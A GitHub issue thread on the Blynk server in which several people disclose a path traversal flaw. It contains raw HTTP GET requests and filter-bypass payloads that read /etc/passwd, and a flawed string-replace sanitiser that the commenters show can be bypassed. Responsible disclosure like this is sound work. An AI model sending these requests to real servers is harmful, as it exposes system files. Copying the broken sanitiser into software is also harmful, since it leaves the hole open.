New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Path operation vulnerability #1256

Closed
OldFRE opened this Issue Sep 30, 2018 · 8 comments

Comments

Projects
None yet
5 participants
@OldFRE

OldFRE commented Sep 30, 2018

1、normal boot software
eg: java -jar server-0.39.6-java8.jar -dataFolder Blynk/

2、Access paths and grab packets
Modify HTTP request packet
eg .1

GET /static/../../../../../../../../etc/passwd HTTP/1.1
Host: 192.168.169.1:9443
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: /


eg .2

GET /static/js/../../../../../../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 192.168.169.1:9443
Accept: /
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: https://192.168.169.1:9443/admin
Cookie: session=f14e5805-5870-46f9-8959-b2655945721b


You can access /etc/passwd.

0be8c295-98a8-4f93-a727-41c22c4f34d0
b87a970e-f515-4254-9d88-8c3bcff2acd5
1499f5c1-f619-4a40-a276-45f261d7c2d7

Thank you very much !

@doom369

This comment has been minimized.

Show comment
Hide comment
@doom369

doom369 Sep 30, 2018

Collaborator

@OldFRE thanks! Fixed. Please let me know if you expect any reward from us (dmitriy@blynk.cc)

Collaborator

doom369 commented Sep 30, 2018

@OldFRE thanks! Fixed. Please let me know if you expect any reward from us (dmitriy@blynk.cc)

@doom369 doom369 closed this Sep 30, 2018

@OldFRE

This comment has been minimized.

Show comment
Hide comment
@OldFRE

OldFRE Sep 30, 2018

Thank you very much. If there is a reward, can I pay with paypal?
My PayPal (1562574225@qq.com)
If not, then no use. I really want to trouble you!

OldFRE commented Sep 30, 2018

Thank you very much. If there is a reward, can I pay with paypal?
My PayPal (1562574225@qq.com)
If not, then no use. I really want to trouble you!

@blynkkk

This comment has been minimized.

Show comment
Hide comment
@blynkkk

blynkkk Sep 30, 2018

Owner

Thank you! We sent you a small appreciation for your effort. 🙏

Owner

blynkkk commented Sep 30, 2018

Thank you! We sent you a small appreciation for your effort. 🙏

@OldFRE

This comment has been minimized.

Show comment
Hide comment
@OldFRE

OldFRE Sep 30, 2018

Thank you very much. Thank you very much for your reward! ;)

OldFRE commented Sep 30, 2018

Thank you very much. Thank you very much for your reward! ;)

@svnk42

This comment has been minimized.

Show comment
Hide comment
@svnk42

svnk42 Oct 1, 2018

@OldFRE thanks! Fixed. Please let me know if you expect any reward from us (dmitriy@blynk.cc)

Hi there,

I noticed that the implemented fix is not sufficient. Path traversal is still possible e.g. via
GET /static/js/./..././..././..././..././..././..././..././..././.../etc/passwd
in the latest version 0.39.7

svnk42 commented Oct 1, 2018

@OldFRE thanks! Fixed. Please let me know if you expect any reward from us (dmitriy@blynk.cc)

Hi there,

I noticed that the implemented fix is not sufficient. Path traversal is still possible e.g. via
GET /static/js/./..././..././..././..././..././..././..././..././.../etc/passwd
in the latest version 0.39.7

@doom369

This comment has been minimized.

Show comment
Hide comment
@doom369

doom369 Oct 1, 2018

Collaborator

@svnk42 thanks! Build updated.

Collaborator

doom369 commented Oct 1, 2018

@svnk42 thanks! Build updated.

@harupu

This comment has been minimized.

Show comment
Hide comment
@harupu

harupu Oct 3, 2018

Hi there,

It seems path traversal is still possible.

uri = uri.replace("/.", "");

This replace just remove /. and still allow to bypass with //... like below:

static//...//...//...//...//...//...//...//.../etc/passwd

To remove path traversal attack vector by using replace, we must check /.. again after replace like below:

while(uri.indexOf("../") != -1) {
   uri = uri.replace("../", "");
}

I think using getCanonicalPath() is Better way to check path traversal attack.

harupu commented Oct 3, 2018

Hi there,

It seems path traversal is still possible.

uri = uri.replace("/.", "");

This replace just remove /. and still allow to bypass with //... like below:

static//...//...//...//...//...//...//...//.../etc/passwd

To remove path traversal attack vector by using replace, we must check /.. again after replace like below:

while(uri.indexOf("../") != -1) {
   uri = uri.replace("../", "");
}

I think using getCanonicalPath() is Better way to check path traversal attack.

@doom369

This comment has been minimized.

Show comment
Hide comment
@doom369

doom369 Oct 3, 2018

Collaborator

@harupu thanks! Build updated.
I know it requires a more solid fix, will fix it when I have more time. Anyway, if you find something else, please let me know.

Collaborator

doom369 commented Oct 3, 2018

@harupu thanks! Build updated.
I know it requires a more solid fix, will fix it when I have more time. Anyway, if you find something else, please let me know.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment